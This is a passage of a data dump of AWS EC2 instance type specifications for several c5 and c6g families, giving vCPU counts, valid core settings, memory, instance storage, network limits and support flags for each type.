'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 
'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 
'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1], 'SizeInMiB': 98304, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.12xlarge', 
'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1], 'SizeInMiB': 98304, 'TotalSizeInGB': 2850, 'Disks': [{'SizeInGB': 1425, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.12xlarge', 'CurrentGeneration': True, 
'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 48, 'DefaultCores': 48, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 2850, 'Disks': [{'SizeInGB': 1425, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 
'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 131072, 'TotalSizeInGB': 2400, 'Disks': [{'SizeInGB': 1200, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 32, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16, 20, 24, 28, 32], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 131072}, 
'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 2400, 'Disks': [{'SizeInGB': 1200, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '20 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1], 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 
'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1], 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.16xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64, 'DefaultCores': 64, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 
'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 64, 'SizeInMiB': 131072, 'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 64}, 'MemoryInfo': {'SizeInMiB': 131072}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3800, 'Disks': [{'SizeInGB': 1900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 
'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 
'c5d.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 
'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 196608, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.24xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96, 'DefaultCores': 48, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 